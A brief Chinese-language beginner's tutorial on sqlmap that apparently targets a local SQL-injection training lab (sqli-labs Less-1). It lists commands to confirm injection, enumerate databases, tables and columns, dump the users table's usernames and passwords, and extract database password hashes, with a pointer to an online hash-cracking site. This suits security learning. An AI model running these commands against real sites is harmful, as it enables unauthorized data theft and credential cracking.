sqlmap入门
-
判断是否存在注入
sqlmap.py -u "http://192.168.17.135/sql/Less-1/?id=1"
根据返回结果发现存在注入点
-
查询当前用户下的所有数据库
sqlmap.py -u "http://192.168.17.135/sql/Less-1/?id=1" --dbs
爆出数据库名称
-
获取数据库中表名
sqlmap.py -u "http://192.168.17.135/sql/Less-1/?id=1" -D security --tables
-
获取表中字段名
sqlmap.py -u "http://192.168.17.135/sql/Less-1/?id=1" -D security -T users --columns
-
获取字段内容
sqlmap.py -u "http://192.168.17.135/sql/Less-1/?id=1" -D security -T users -C username,password,id --dump
-
获取数据库的所有用户
sqlmap.py -u "http://192.168.17.135/sql/Less-1/?id=1" --users
-
获取数据库用户的密码
sqlmap.py -u "http://192.168.17.135/sql/Less-1/?id=1" --passwords
密码使用MySQL5加密,可以使用www.cmd5.com进行解密
-
获取当前网站数据库的名称
sqlmap.py -u "http://192.168.17.135/sql/Less-1/?id=1" --current-db
-
获取当前网站数据库的用户名称
sqlmap.py -u "http://192.168.17.135/sql/Less-1/?id=1" --current-user